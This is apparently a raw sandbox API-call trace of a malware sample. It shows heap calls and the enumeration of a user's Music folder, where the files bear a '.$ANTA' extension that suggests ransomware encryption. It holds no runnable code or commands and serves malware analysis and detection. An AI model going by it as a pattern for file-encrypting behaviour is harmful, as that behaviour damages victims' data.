[0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0116.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0116.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0116.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0116.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0116.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0116.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0116.128] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0116.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0116.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0116.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0116.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0116.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0116.129] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\*", lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9012730, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x1158cf61, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1158cf61, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca4f0, cFileName=".", cAlternateFileName="")) returned 0x41abfc0 [0116.129] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9012730, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x1158cf61, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1158cf61, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca4f0, cFileName="..", cAlternateFileName="")) returned 1 [0116.129] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e07b50, ftCreationTime.dwHighDateTime=0x1d5ef8e, ftLastAccessTime.dwLowDateTime=0x16f59510, ftLastAccessTime.dwHighDateTime=0x1d5ede3, ftLastWriteTime.dwLowDateTime=0x16f59510, ftLastWriteTime.dwHighDateTime=0x1d5ede3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca4f0, cFileName="-a1fx91SeT 48T", cAlternateFileName="-A1FX9~1")) returned 1 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0116.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0116.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0116.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.130] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.130] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0116.130] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0116.130] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.131] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0116.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0116.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.131] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0116.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0116.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0116.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.131] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0116.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0116.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0116.132] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.132] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.132] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10c0b66b, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x10c0b66b, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x10cc89c9, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="0QhbS_hT9Zbd62A.m4a.$ANTA", cAlternateFileName="0QHBS_~1.$AN")) returned 1 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0116.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0116.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0116.133] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.133] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0116.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0116.133] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.133] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.134] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.134] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10df9d48, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x10df9d48, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x10e4617b, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xafd0, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="4YRCHooZsp.mp3.$ANTA", cAlternateFileName="4YRCHO~1.$AN")) returned 1 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0116.134] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.134] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0116.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0116.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0116.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0116.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0116.135] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.135] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0116.135] RtlAllocateHeap 